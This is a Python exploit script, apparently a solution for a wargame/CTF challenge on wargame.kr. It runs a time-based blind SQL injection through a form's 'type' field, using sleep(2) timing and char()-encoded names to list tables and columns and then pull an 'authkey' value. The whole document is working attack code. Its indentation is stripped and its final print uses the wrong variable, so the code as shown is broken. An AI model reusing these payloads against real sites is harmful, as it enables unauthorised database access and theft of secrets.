import requests
import time
def request_len(query, count=-1):
for i in range(0,100):
if(count==-1): payload = query.format(i)
else: payload = query.format(count,i)
data = {'cont':'','mail':'','type': payload}
print (payload)
start=time.time()
res = requests.post(url, cookies=cookies, data=data)
end=time.time()
if(end-start>2):
print("[*] LENGTH: "+str(i))
return i
return -1
def request_value(query, value_len, count=-1):
value=''
for i in range(1, value_len+1):
for j in index_list:
if(count==-1): payload = query.format(i,j)
else: payload = query.format(count,i,j)
data = {'cont':'','mail':'','type': payload}
print (payload)
start=time.time()
res = requests.post(url, cookies=cookies, data=data)
end=time.time()
if(end-start>2):
value += chr(j)
break
print("[*] VALUE: "+value)
return value
if __name__=='__main__':
cookies= {'ci_session':'YourSessionValue'}
url = 'http://wargame.kr:8080/qna/?page=to_jsmaster'
index_list = list(range(48,58))+[95]+list(range(97,123))
######################### TABLE ##############################
query="(if(length((select table_name from information_schema.tables where table_type=concat(char(98),char(97),char(115),char(101),char(32),char(116),char(97),char(98),char(108),char(101)) limit 0,1))={0},sleep(2),1))"
table_len=request_len(query)
if( table_len == -1):
exit("table_len code Error")
print(table_len)
query="(if(ascii(substr((select table_name from information_schema.tables where table_type=concat(char(98),char(97),char(115),char(101),char(32),char(116),char(97),char(98),char(108),char(101)) limit 0,1),{0},1))={1},sleep(2),1))"
table_name=request_value(query, table_len)
if( table_name == '' ):
exit("table_name code Error")
######################### COLUMN ##############################
query="(if(length((select count(column_name) from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121))))={0},sleep(2),1))"
column_count=request_len(query)
if( column_count == -1):
exit("column_count code Error")
column=[]
for count in range(0, column_count):
query="(if(length((select column_name from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121)) limit {0},1))={1},sleep(2),1))"
column_len=request_len(query, count)
if( column_len == -1):
exit("column_len code Error")
query="(if(ascii(substr((select column_name from information_schema.columns where table_name=concat(char(97),char(117),char(116),char(104),char(107),char(101),char(121)) limit {0},1),{1},1))={2},sleep(2),1))"
column_name=request_value(query, column_len, count)
if( column_name == '' ):
exit("column_name code Error")
column.append(column_name)
print("COLUMN: "+str(column))
######################### AUTHKEY_VALUE ##############################
AUTHKEY=''
query="(if(length((select authkey from authkey limit 0,1))={0},sleep(2),1))"
AUTHKEY_len=request_len(query)
if( AUTHKEY_len == -1):
exit("AUTHKEY_len code Error")
query="(if(ascii(substr((select authkey from authkey limit 0,1),{0},1))={1},sleep(2),1))"
AUTHKEY_value=request_value(query, AUTHKEY_len)
if( AUTHKEY_value == '' ):
exit("AUTHKEY_value code Error")
print("[*] AUTHKEY: "+AUTHKEY)